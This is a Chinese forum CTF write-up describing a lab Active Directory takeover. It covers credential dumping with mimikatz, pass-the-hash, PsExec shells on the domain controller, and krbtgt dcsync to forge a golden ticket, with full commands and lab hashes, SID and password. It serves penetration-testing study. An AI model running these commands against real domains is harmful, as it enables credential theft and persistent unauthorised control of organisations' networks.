【内网渗透下WP】拿下域控(哈希传递与制作黄金票据)基础知识+靶场知识完整版

久违的双子座   ·   发表于 2020-12-21 18:35:22   ·   CTF&WP专版

这是接着上一篇文章【内网渗透上WP】(基础知识+靶场操作完整版)SQL拿shell、WIN提权的后续。

一、基本思路

查询完整域名、找到域控主机—> 通过哈希传递获取域控管理员权限(类似于获取高权限Cookie,成为管理员)—> 登陆域控主机找到关键信息(获取flag)—>制作黄金票据,维持长久权限

二、基础知识

1、提升本机权限至system,以便查询完整域名、找到域控主机

查看域控主机名命令

  1. net user /domain

但发现会被拒绝访问,发生这种情况,有两个原因:
(1)本机权限不够:
(2)本机账号在域内权限不够:
解决方案,可以使用微软官方工具PsExec.exe,提升本机管理员权限至系统权限(system)

提升命令

  1. PsExec.exe -i -s -d cmd

调出域控主机cmd命令

  1. PsExec.exe \\完整域名 cmd

2、哈希(hash)传递

使用工具minikatz
这个工具还是三板斧

  1. Log //新建转存显示信息到同目录txt文件里
  2. Privilege::debug //开启特权调试模式
  3. Sekurlsa::logonpasswords //抓取管理员账号密码等信息

获取结果中的administrator的domain 和ntlm,我们要借用管理员的值,把自己伪装成域控主机管理员。
获取后,执行下面命令,即可自带域管理员信息访问了

  1. Sekurlsa::pth /user:administrator /domain”域名” /ntlm:值

3、域控主机硬盘命令

dir \完整域控主机域名\盘符$

  1. dir \\DC.zkaq.cn\c$ //样例

4、制作黄金票据

原理:krbtgt账户是KDC秘钥分发中心用的超管密码,使用此账户票据,客户机会认为我们是KDC秘钥分发中心,会直接给最高权限允许我们访问,一般管理员会修改域控机密码,但是很少有管理员会修改Krbtgt的密码。这就是所谓的黄金票据,可以维持长久访问的秘诀。

在域控主机上,使用工具minikatz 命令如下:

  1. lsadump::dcsync /user:krbtgt

结果中收集两个值OSID(最后的50X不要)和hash_htlm

制作票据命令:

  1. Kerberos::golden /admin:administrator /domain:”域名” /sidOSID /krbtgt:hash_htlm /ticket:administrator.随便起

加载票据

  1. Kerberos::ptt administrator.随便起(与生成时命名一致)

三、靶场演示

  • 1、接着上一篇文章内网渗透上获取了账号:administrator 密码:woshifengge1. 远程连接靶场链接afsgr16-b1ferw.aqlab.cn:12781。再远程连接10.0.1.8

  • 2、查看主机信息
    ipconfig

systeminfo

以上信息可知是64位系统,成员服务器,域名为zkaq.cn,域控主机IP大概率是10.0.1.6 ,由此得出下一步思路是查询域控主机名还有,还有获取域控主机管理员的信息值。(哈希传递)

  • 3、查询域控主机名,遭拒绝,需利用官方工具将账号提升至system权限,再查

    net user /domain

上传官方工具PsExec.exe提权

  1. PsExec.exe -i -s -d cmd //注意路径,详见下图,获取主机名DC.zkaq.cn

  • 4、尝试访问域控主机C盘

  • 5、是拒绝的,需要工具minikatz,使用哈希传递

获取
user=administrator
Domain=ZKAQ
NTLM=61465a991b168727b65b3644aab823cd

将值放入下方命令中,完成哈希传递,以后利用这个CMD窗口运行,会自带域控管理员的值(类似于cookie),拥有管理员权限。

  1. Sekurlsa::pth /user:administrator /domain:”ZKAQ /ntlm:61465a991b168727b65b3644aab823cd

  • 6、启动域控主机cmd窗口,正式访问域控主机

使用官方工具PsExec.exe,命令如下:

  1. PsExec.exe \\dc.zkaq.cn cmd //注意执行路径在工具处哈

注意:需要在新弹出的能访问c盘的那个cmd窗口使用此命令。我个人对这个理解是,弹出的各个CMD窗口,权限各不相同,权限步步提升,不能乱来,否则权限不够。(个人理解,如果有误,请大佬们即使指正哈)

  • 7、下一步,有两种方式

(1)cmd窗口,通过命令行一步步找到flag(特别麻烦,命令我给大家贴出来)

  1. cd 到路径c:\Users\Administrator.DC\Desktop目录下,有个flag.txt.txt
  2. Type flag.txt.txt //获取flag

(2)新建账号,直接远程登陆域控主机,拿到flag(下面截图展示这个方式)

建好账号后,直接登陆域控主机10.0.1.6(DC.zkaq.cn)

  • 8、至此,靶场已经完成。但我们想更深入一步,制作黄金票据,长久维持权限!

在域控主机上,上传工具minikatz,右键管理员启动

  1. lsadump::dcsync /user:krbtgt //minikatz模拟域控请求账号密码信息

获取krbtgt账号的关键值(OSID和Hash_NTLM)

写入命令,如下

(1)制作票据

  1. kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-4098506371-3349406080-1400905760 /krbtgt:9f7afad7acc9f72b7e338b908795b7da /ticket:administrator.heason

(2)加载票据

  1. kerberos::ptt administrator.heason

现在试着返回10.0.1.8 测试这个黄金票据
(1)在10.0.1.8上启用普通cmd,尝试访问域控主机c盘资料,无权限。

(2)将黄金票据拷贝至桌面,启动工具mimikatz,使用加载命令

  1. kerberos::ptt administrator.heason

之后再次在普通cmd窗口中尝试,成功了!!!

以上就是全部过程,完结,撒花!!!

用户名金币积分时间理由
veek 80.00 0 2020-12-22 10:10:46 排版优秀

打赏我,让我更有动力~

0 Reply   |  Until 2020-12-21 | 1165 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.